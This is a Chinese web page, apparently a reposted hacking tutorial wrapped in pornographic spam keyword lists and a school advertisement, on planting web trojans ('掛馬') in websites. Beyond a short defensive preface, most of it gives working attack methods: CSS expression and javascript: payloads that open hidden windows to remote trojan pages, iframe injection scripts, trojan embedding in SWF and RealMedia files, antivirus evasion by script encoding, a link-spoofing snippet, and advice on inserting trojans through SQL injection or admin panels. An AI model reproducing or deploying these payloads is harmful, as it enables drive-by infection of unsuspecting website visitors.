亚洲毛片视频_国产精品日韩高清_国产伦理一区_国产精品视频免费一区_亚洲精品1区2区_美女尤物久久精品_亚洲人体大胆视频_亚洲欧美日韩精品久久久_国产一区成人_国产精品综合

CSS掛馬的相關知識及相應防范方法

        隨著Web2.0的普及,各種網頁特效用得越來越多,這也給黑客一個可乘之機。他們發現,用來制作網頁特效的CSS代碼,也可以用來掛馬。而比較諷刺的是,CSS掛馬方式其實是從防范E掛馬的CSS代碼演變而來。

        網站掛馬的手段最初非常單一,但是隨著Web2.0技術以及Blog、Wiki等廣泛的應用,掛馬也涌現出各種各樣的技術,其中CSS掛馬方式,可以說是Web2.0時代黑客的最愛。有許多非常著名的網站都被黑客用CSS掛馬入侵過。

        在我印象中,記憶最深刻的一次是百度空間CSS掛馬。當時,百度空間推出沒有多久,就有許多百度用戶收到了類似“哈,節日快樂呀!熱烈慶祝2008,心情好好,記住要想我!http://hi.baidu.com/XXXXX”的站內消息。

        由于網址是百度空間的網址,許多用戶認為不會存在安全問題,加上又有可能是自己朋友發來的,因此會毫不猶豫地點擊進入。但是進入指定的網址后,用戶就會感染蠕蟲病毒,并繼續傳播。

        由于蠕蟲擴散非常嚴重,最終導致百度空間不得不發布官方聲明提醒用戶,并且大費周折地在服務器中清除蠕蟲的惡意代碼。那一次的掛馬事件利用的就是百 度空間CSS模板功能,通過變形的e-xpression在CSS代碼中動態執行腳本,讓指定的遠程惡意代碼文件在后臺悄悄運行并發送大量偽造信息。

        我建議大家在點擊陌生鏈接時,要多個心眼,大網站也是可能被掛馬的。大家在上網時,最好還是使用一些帶網頁木馬攔截功能的安全輔助工具。

黑客為什么選擇CSS掛馬?

        在Web1.0時代,使用E掛馬對于黑客而言,與其說是為了更好地實現木馬的隱藏,倒不如說是無可奈何的一個選擇。在簡單的HTML網頁和缺乏交互性的網站中,黑客可以利用的手段也非常有限,即使采取了復雜的偽裝,也很容易被識破,還不如E來得直接和有效。

        但如今交互式的Web2.0網站越來越多,允許用戶設置與修改的博客、SNS社區等紛紛出現。這些互動性非常強的社區和博客中,往往會提供豐富的功能,并且會允許用戶使用CSS層疊樣式表來對網站的網頁進行自由的修改,這促使了CSS掛馬流行。

小百科:

        CSS是層疊樣式表(CascadingStyleSheets)的英文縮寫。CSS最主要的目的是將文件的結構(用HTML或其他相關語言寫的)與文件的顯示分隔開來。這個分隔可以讓文件的可讀性得到加強、文件的結構更加靈活。

        黑客在利用CSS掛馬時,往往是借著網民對某些大網站的信任,將CSS惡意代碼掛到博客或者其他支持CSS的網頁中,當網民在訪問該網頁時惡意代碼 就會執行。這就如同你去一家知名且證照齊全的大醫院看病,你非常信任醫院,但是你所看的門診卻已經被庸醫外包了下來,并且打著醫院的名義利用你的信任成功 欺騙了你。但是當你事后去找人算賬時,醫院此時也往往一臉無辜。對于安全工程師而言,CSS掛馬的排查是必備常識。

CSS掛馬攻防實錄

        攻CSS掛馬方式較多,但主流的方式是通過有漏洞的博客或者SNS社交網站系統,將惡意的CSS代碼寫入支持CSS功能的個性化頁面中。下面我們以典型的CSS掛馬方式為例進行講解。

方式1:

Body

“background-image”在CSS中的主要功能是用來定義頁面的背景圖片。這是最典型的CSS掛馬方式,這段惡意代碼主要是通過“background-image”配合t代碼讓網頁木馬悄悄地在用戶的電腦中運行。

        那如何將這段CSS惡意代碼掛到正常的網頁中去呢?黑客可以將生成好的網頁木馬放到自己指定的位置,然后將該段惡意代碼寫入掛馬網站的網頁中,或者掛馬網頁所調用的CSS文件中。

小百科:

        使用Body對象元素,主要是為了讓對象不再改變整個網頁文檔的內容,通過Body對象的控制,可以將內容或者效果控制在指定的大小內,如同使用DIV對象那樣精確地設置大小。

方式2:

Body

background-image: url(t:open(”http://www.X.com/muma.htm“,”newwindow”,”border=”1″ Height=0, Width=0, top=1000, center=0, toolbar=no,menubar=no, scrollbars=no,resizable=no,location=no,status=no”))

        方式1的CSS掛馬技術,在運行時會出現空白的頁面,影響網頁訪問者正常的訪問,因此比較容易發現。不過在方式2中的這段代碼,使用了t的Open 開窗,通過新開一個隱藏的窗口,在后臺悄悄地運行新窗口并激活訪問網頁溢出木馬頁面,不會影響訪問者觀看網頁內容,因此更加隱蔽。

        防網絡服務器被掛馬,通常會出現防病毒軟件告警之類的信息。由于漏洞不斷更新,掛馬種類時刻都在變換,通過客戶端的反映來發現服務器是否被掛馬往往疏漏較大。正確的做法是經常檢查服務器日志,發現異常信息,經常檢查網站代碼,使用網頁木馬檢測系統,進行排查。

        目前除了使用以前的阻斷彈出窗口防范CSS掛馬之外,還可以在網頁中設置CSS過濾,將CSS過濾掉。不過如果你選擇過濾CSS的話,首先需要留意自己的相關網頁是否有CSS的內容,因此我們仍然首推用阻斷方式來防范CSS。阻斷代碼如下所示:

emiao1:e-xpression(this.src=”about:blank”,this.outerHTML=”");

        將外域的木馬代碼的src重寫成本地IE404錯誤頁面的地址,這樣,外域的t代碼不會被下載。不過阻斷方式也有天生致命的弱點,弱點的秘密我們將于下次揭曉。


幾種常見CSS掛馬代碼示例:

網上流行的:
body
{
background-image: url('javascript:document.write("
")')
}

//此方法會使主頁不正常.返回一片空白.
用彈窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}

//彈出一個框.難看 易被發現.
改進一下:

body
{
background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}

test.htm里面的代碼,a.js為你的網馬,彈出一個不可見的窗口,并在5秒自動后關閉沒提示:



a.js內容:
document.write('<!--Iframe src="http://192.168.0.5/calc.htm"></iframe-->');


黑客常用的掛馬方法及防范

1、掛馬的N種方法

(1) HTML掛馬法。

        常規的HTML掛馬方法一般是在網頁中插入一條iframe語句,像。查看站點是否被掛,一般是查找一下關鍵詞iframe。

(2) 再隱藏一點的就是js掛馬了。

        像再原來的網頁中寫入 ,horse里的js寫法一般為 document.write(’http:\/\/www.arthack.org\/horse.html’>;,或者專業一點的寫法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n”;。不過第2種寫法要注意:是原來的網頁種要有body標簽。

3) 在 css中掛馬。

這個方法就是在css中寫入
body {
hytop:e­xpression(top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n
<!--iframe src=http://www.xxx.com/horse.html/”></iframe-->’);
}

        然后在主頁中調用這個CSS,代碼類似http://www.arthack.org/css.css” rel=”stylesheet” type=”text/css”>這樣的。在csdn 中對e­xpression的解釋是:IE5及其以后版本支持在CSS中使用e­xpression,用來吧CSS屬性和javascript表達式關聯起來,這里的CSS屬性可以是元素固有的屬性,也可以是自定義屬性。也就是說CSS屬性后面可以是一段Javasccript表達式,CSS屬性的值等于 javascript表達式計算的結果。在表達式中可以是直接一用元素自身的屬性和方法,也可以使用其它瀏覽器對象。這個表達式就好像是在這個元素的一個成員函數中一樣。整個解釋關鍵點是e­xpression可以在css中引入js語句,所以我們可用于掛馬。不過寫的語句值可以遠程調用,本地不可以。

(4) 在swf中掛馬

        網上有一些swf掛馬的工具,可以用工具替換原來網頁中的swf或單獨把swf發給對方,一可以單獨作一個可顯示swf頁的網頁。在網頁中插入swf的語法一般格式為:

(5) 在影音文件中掛馬。

        所需工具是RealMedia Editor,打開工具后,然后依次選擇”文件”-”打開Real媒體文件”,然后選擇需要編輯的視頻文件,其格式必須是RealOne公司的以RM或 RMVB為擴展名的文件。接著,新建一個文本,在里面輸入u 00:00:10:0 00:00:30.0&&_rpexternal& http://www.arthack.org/horse.htm (00:00:10.0就是發生第一事件的時間,這里是讓計算機彈出網頁;00:00:30.0同樣,這是第二次發生的時間,在0時0分第30秒0微妙時彈出窗口;而后面的URL地址就是連接指定的木馬地址。)

        輸入完畢后并保存,然后依次選擇”工具”-”合并事件”,導入剛才的文本。當合并完成后,依次選擇”文本”-”Real文件另存為”,保存好即可。

        最后把生成的視頻文件發布網上,當對方觀看同時就會連接到你指定的木馬地址

2、掛馬的技巧

        掛馬首先要求的是隱蔽性,這樣掛的時間才能長。像在SWF、JS、RM中掛馬就是比較隱蔽了,但是還可再用到些技巧。

(1)遠程任意后綴執行HTML

        可以把horse.html改成horse.jpg之類的后綴,然后語句寫成。js也可以,語句為 ,甚至js的不要后綴名都可以。

2)JS的加密

        為了保護網頁木馬的代碼,可以把JS內容加密,還能躲開殺軟的作用。如果使用ENCODE加密方式,加密后的JS調用語句就用。除此方法外,還有其它更多的方法!

(3)URL的變形

        URL的變形方法也有很多,例如將url的16進制轉換為encod編碼等。如果是涉及到URL欺騙的方法就更多了,不過多數的URL欺騙,像利用@的技巧,IE都已經打補丁了。但現在有個漏洞仍然有效,代碼如下:
<!-->
<a id=”CZY” href=http://www.arthack.org”></a>
<div>
<a href=http://www.google.cn” target=”_blank”>
<table>
<caption>
<a href=http://www.google.cn” target=”_blank”>
<label for=”CZY”>
<u style=”cursor: pointer: color: blue”>
Google</u>
</label></a></caption></table></a></div><-->

    保存該代碼為網頁后,鼠標移動到Google這個鏈接上時,IE狀態欄顯示的http://www.google.cn,但點擊鏈接后卻打開 http://www.arthack.org網站。如果你的網馬可以用IP地址訪問到的話,IP地址也可以進行轉換的。像127.0.0.1這樣的IP 還可以 變為 2130706433、0×7f.0×00.0×00.0×01、0177.0000.0000.0001等等,這只不過是8進制、10進制、16進制、的轉換而已。

3、如何才能掛到馬

    拿到了webshell的話,掛馬自然是很簡單了。但是拿不到的情況下,如果注入點有update權限,我們可以仔細查找首頁中的某條新聞的調用鏈接,然后update數據庫達到我們的目的。如果可進入后臺,我沒就可以在一些發公告的地方寫入自己的木馬代碼(不過千萬別打亂前臺html源文件里的代碼邏輯)。

北大青鳥網上報名
北大青鳥招生簡章
亚洲毛片视频_国产精品日韩高清_国产伦理一区_国产精品视频免费一区_亚洲精品1区2区_美女尤物久久精品_亚洲人体大胆视频_亚洲欧美日韩精品久久久_国产一区成人_国产精品综合
一区二区三区自拍| 精品视频资源站| 久久综合福利| 日韩欧美国产综合在线一区二区三区| 国产欧美日韩视频在线观看| 亚洲一区二区三区视频在线播放| 欧美α欧美αv大片| 在线中文字幕不卡| 2023国产精品| 午夜免费欧美电影| 欧美高清一区二区| 欧美色手机在线观看| 国产精品电影一区二区三区| 久久99精品国产麻豆不卡| 精品999网站| 91精品国产综合久久精品app| 久久综合九九| 在线视频精品| 日韩免费视频一区二区| 亚洲成av人片一区二区| 午夜免费电影一区在线观看| 欧美日韩精品一区二区三区蜜桃| 亚洲三级电影网站| 99国产精品久久| 欧美色视频在线| 亚洲电影视频在线| 欧美日韩天天操| 欧美激情第8页| 欧美日韩a区| 884aa四虎影成人精品一区| 一区二区三区国产精品| 91亚洲精品乱码久久久久久蜜桃 | 国产精品美女久久久久久2018| 美国av一区二区| 国产欧美一区二区视频| 久久久一区二区三区捆绑**| 久久久久国产精品麻豆| 精品久久久久久综合日本欧美| 日本一区中文字幕| 一区二区三区你懂的| 亚洲国产经典视频| av日韩在线网站| 欧美一区二区视频在线观看2020| 亚洲3atv精品一区二区三区| 99精品福利视频| 国产精品全国免费观看高清 | 日韩精品免费视频人成| 亚洲乱码视频| 自拍偷拍国产精品| 国内精品久久久久久久影视蜜臀| 久久综合九色综合97婷婷女人| 国产麻豆欧美日韩一区| 欧美日韩成人综合天天影院| 男人操女人的视频在线观看欧美 | 亚洲精品在线免费播放| www久久精品| 成人夜色视频网站在线观看| 8x福利精品第一导航| 看国产成人h片视频| 欧美视频一二三区| 另类中文字幕网| 欧美日韩极品在线观看一区| 另类小说欧美激情| 欧美精品丝袜中出| 国产成人免费在线观看| 欧美日韩亚洲一区二区三区四区| 久久色中文字幕| 亚洲欧美韩国综合色| 一区二区三区欧美在线| 亚洲一区av在线| 色婷婷综合久久| 美女视频黄久久| 欧美精品一二三| av爱爱亚洲一区| 国产精品区一区二区三| 亚洲精品影院在线观看| 亚洲成人高清在线| 欧美婷婷六月丁香综合色| 国产一区二区三区视频在线播放| 91精品国产手机| 亚洲欧美一级二级三级| 自拍偷拍欧美激情| 销魂美女一区二区三区视频在线| 日韩和的一区二区| 欧美精品日韩一区| 欧美人与禽猛交乱配视频| 亚洲视频1区2区| 91久久免费观看| 国产·精品毛片| 国产精品免费视频观看| 亚洲影音一区| 国产成人自拍网| 国产精品美女久久久久aⅴ国产馆 国产精品美女久久久久av爽李琼 国产精品美女久久久久高潮 | 亚洲一区二区三区视频在线播放| 在线观看欧美日本| 成人av在线观| 亚洲男人的天堂网| 欧美色老头old∨ideo| 99re这里只有精品视频首页| 亚洲欧美日韩中文字幕一区二区三区| 久久精品一区| 成人一区二区三区在线观看| 中文字幕一区在线| 欧美日韩精品福利| 欧美国产先锋| 男女性色大片免费观看一区二区 | 欧美日韩小视频| 99久久夜色精品国产网站| 一区二区三区四区精品在线视频| 欧美中文字幕不卡| 国产一区亚洲| 精品写真视频在线观看| 中文字幕一区二区三| 丰满放荡岳乱妇91ww| 亚洲精品国产一区二区精华液| 欧美老肥妇做.爰bbww视频| 国产综合色产| 国产揄拍国内精品对白| 亚洲天天做日日做天天谢日日欢 | 91丨九色丨蝌蚪丨老版| 视频一区视频二区中文字幕| 久久亚洲一区二区三区明星换脸 | 久久精品视频一区| 日本久久一区二区| 亚洲私人影院| 国产成人精品一区二区三区四区| 一区二区三区在线视频播放| 欧美成人精品1314www| 玖玖视频精品| 尹人成人综合网| 成人高清视频免费观看| 日韩欧美一级二级三级久久久| 一区二区三区精品国产| 欧美ab在线视频| 国产精品一区免费在线观看| 亚洲午夜私人影院| 国产精品蜜臀在线观看| 日韩亚洲欧美高清| 欧美在线高清视频| 国产精品亚洲综合色区韩国| 91色porny蝌蚪| 国产精品1024| 精品一区二区三区久久久| 亚洲图片欧美色图| 日韩码欧中文字| 日本一区二区三区在线观看| 日韩一二在线观看| 欧美日韩色一区| 久久九九99| 国产欧美69| 最新日韩av| 欧美日韩国产亚洲一区| 成人小视频免费观看| 国产一区二区网址| 蜜臀va亚洲va欧美va天堂| 亚洲一区二区三区四区在线免费观看 | 国产伦精品一区二区三区免费| 亚洲成人免费影院| 亚洲国产精品一区二区久久 | 91精品免费观看| 欧美人体做爰大胆视频| 在线免费观看日本欧美| 亚洲欧美日本日韩| 午夜一区二区三区不卡视频| 国产欧美日韩一区二区三区| 最近看过的日韩成人| 亚洲激情视频| 99在线精品免费视频九九视| 亚洲天堂偷拍| 亚洲国产精品久久久久婷婷老年| 狠狠综合久久av一区二区老牛| 午夜精品999| 黄色国产精品| 999在线观看精品免费不卡网站| 亚洲精品看片| 国产精品久久久久久久久久妞妞| 国产精品一区二区欧美| 免费亚洲一区| 欧美在线免费播放| 91精品一区二区三区久久久久久| 欧美一区二区三区在线电影| 欧美成人r级一区二区三区| 久久一夜天堂av一区二区三区| 久久一留热品黄| 亚洲欧美自拍偷拍色图| 色欧美乱欧美15图片| 欧美日韩精品一区二区| 欧美一卡二卡三卡四卡| 精品欧美一区二区三区精品久久 | 夜夜嗨一区二区| 激情六月婷婷久久| 国产成人精品影院| 欧美午夜不卡| 国产精品婷婷| 欧美日韩mp4| 久久久久久电影| 自拍av一区二区三区| 日韩在线观看一区二区| 国产伦精品一区二区三区在线观看| 成人精品鲁一区一区二区|